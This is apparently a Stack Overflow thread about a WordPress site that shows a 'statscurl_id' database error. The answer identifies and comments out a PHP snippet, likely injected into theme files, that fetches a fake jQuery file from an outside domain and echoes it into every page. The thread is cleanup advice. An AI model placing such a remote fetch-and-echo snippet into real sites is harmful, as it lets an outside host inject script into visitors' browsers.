# SQL statscurl_id Error using Wordpress

Tags: php, wordpress, jquery

I get this error at the bottom of my home page. please let me know why this error appeared in my website.
I am running my website on wordpress.
Here is the error

```
Couldn't connect to database server.Couldn't find database cjquery.An unexpected problem has occured with the application.
SELECT statscurl_id FROM `statscurl` WHERE statscurl_ip = '';
```

Comment: Unfortunately there could be any number of reasons why you are getting this error. Was it working OK and then suddenly it wasn't? Server updates, hacked?!

Comment: yes suddenly it started getting this error. Sorry what you mean by several reaons

Answer (score 1):

1. Login to the WordPress dashboard
2. Click appearance and then editor
3. Look in functions.php or header.php for the code below:

> [SOURCE](https://stackoverflow.com/a/11902845/1892635)
>
> ```
> <?php
>   if(function_exists('curl_init'))
>   {
>     $url = "http://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js";
>     $ch = curl_init();  
>     $timeout = 5;  
>
>     curl_setopt($ch,CURLOPT_URL,$url); 
>     curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
>     curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); 
>     $data = curl_exec($ch);  
>
>     curl_close($ch); 
>     echo "$data";
>   }
> ?>
> ```

*Remove the code or comment it out so it looks something like this:*

```
<?php
  // if(function_exists('curl_init'))
  // {
    // $url = "http://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js";
    // $ch = curl_init();  
    // $timeout = 5;  

    // curl_setopt($ch,CURLOPT_URL,$url); 
    // curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
    // curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); 
    // $data = curl_exec($ch);  

    // curl_close($ch); 
    // echo "$data";
  //}
?>
```

The above string can vary from site to site.

Comment: If you use HTML comments `<!-- .... -->` the PHP code will still execute. However, this solution seems a bit... _random_!? How does this relate to a "database" (unless it's a malicious JS file)? The linked questions don't offer any explanation and [one of them](http://stackoverflow.com/questions/11919989/couldnt-find-database-jimbob-jc) does indeed regard this as very suspicious.

Comment: Incidentally, the stated URL (`freefilesblog.com/...`) doesn't exist (the referenced question is 4 years old), so the URL is likely to be different in the OP's source (particularly since the name of the database is also different).

Comment: Nope note true... `<?php` is treated as HTML therefore `<!--` works absolutely fine. Only if the code is in the functions will he/she need to use php comments `//` since the <?php will be at the top. Statscurl is related to a old plugin. The database name will vary from site to site as expected.

Comment: "`<?php` is treated as HTML" - well, only the _PHP output_ is treated as HTML - the PHP itself still executes (server-side). (Further, if `$data` was _malicious_ JS then it only needs to contain an HTML comment itself to effectively thwart the outer HTML comment block and to potentially still be executed.)

Comment: ah right, then using // or removing it completely will be the best action but agree this should be investigated but hes not allow... this effects thousands of websites if you Google `statscurl_id`.

Comment: Updated my answer.

Comment: "this effects thousands of websites" - yeah, very suspicious. Many hallmarks of a hack or rogue plugin.